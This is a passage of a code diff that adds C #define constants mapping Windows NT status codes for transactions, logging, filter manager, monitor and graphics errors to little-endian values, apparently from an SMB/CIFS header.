++#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
++#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
++#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
++#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
++#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
++#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
++#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
++#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
++#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
++#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
++#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
++#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
++#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
++#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
++#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
++#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
++#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
++#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
++#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
++#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
++#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
++#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
++#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
++#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
++#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
++#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
++#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
++#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
++#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
++#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
++#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION cpu_to_le32(0xC0190053)
++#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
++#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
++#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
++#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
++#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
++#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
++#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
++#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
++#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
++#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
++#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
++#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
++#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
++#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
++#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
++#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
++#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
++#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
++#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
++#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
++#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
++#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
++#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
++#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
++#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
++#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
++#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
++#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
++#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
++#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
++#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
++#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
++#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
++#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
++#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
++#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
++#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
++#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
++#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
++#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
++#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
++#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
++#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
++#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
++#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
++#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
++#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
++#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
++#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
++#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
++#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
++#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
++#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
++#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
++#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
++#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
++#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
++#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
++#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
++#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
++#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
++#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
++#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
++#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
++#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
++#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
++#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
++#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
++#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
++#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
++#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
++#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
++#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
++#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
++#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
++#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
++#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
++#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
++#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
++#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
++#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
++#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
++#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
++#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
++#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
++#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
++#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
++#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
++#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
++#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK cpu_to_le32(0xC01D0006)
++#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK cpu_to_le32(0xC01D0007)
++#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
++#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
++#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
++#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
++#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
++#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
++#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
++#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
++#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
++#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
++#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
++#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
++#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
++#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
++#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
++#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
++#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
++#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
++#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
++#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
++#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
++#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
++#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
++#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED cpu_to_le32(0xC01E0302)
++#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
++#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
++#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
++#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
++#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
++#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE cpu_to_le32(0xC01E0310)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE cpu_to_le32(0xC01E0311)
++#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
++#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
++#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
++#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
++#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
++#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET cpu_to_le32(0xC01E031B)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
++#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
++#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
++#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION cpu_to_le32(0xC01E0325)
++#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES cpu_to_le32(0xC01E0326)
++#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE cpu_to_le32(0xC01E0328)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET cpu_to_le32(0xC01E0329)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E032E)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
++#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
++#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
++#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
++#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
++#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER cpu_to_le32(0xC01E0334)
++#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
++#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
++#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
++#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
++#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
++#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
++#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
++#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
++#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
++#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
++#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
++#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
++#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT cpu_to_le32(0xC01E0341)
++#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
++#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
++#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION cpu_to_le32(0xC01E0345)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED cpu_to_le32(0xC01E0346)
++#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
++#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
++#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
++#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON cpu_to_le32(0xC01E034D)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
++#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
++#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS cpu_to_le32(0xC01E0350)
++#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
++#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
++#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
++#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
++#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
++#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN cpu_to_le32(0xC01E0357)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT cpu_to_le32(0xC01E0358)
++#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
++#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION cpu_to_le32(0xC01E035A)
++#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
++#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
++#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED cpu_to_le32(0xC01E0400)
++#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
++#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
++#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
++#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
++#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
++#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
++#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS cpu_to_le32(0xC01E051C)
++#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
++#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS cpu_to_le32(0xC01E051F)
++#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
++#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST cpu_to_le32(0xC01E0521)
++#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
++#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
++#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
++#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
++#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
++#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
++#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E0506)
++#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E0507)
++#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E0508)
++#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
++#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
++#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
++#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E050D)
++#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
++#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
++#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
++#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
++#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
++#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA cpu_to_le32(0xC01E0515)
++#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
++#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
++#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE cpu_to_le32(0xC01E0518)
++#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS cpu_to_le32(0xC01E051A)
++#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E051B)
++#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
++#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
++#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
++#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
++#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
++#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
++#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE cpu_to_le32(0xC01E0586)
++#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING cpu_to_le32(0xC01E0587)
++#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
++#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
++#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
++#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
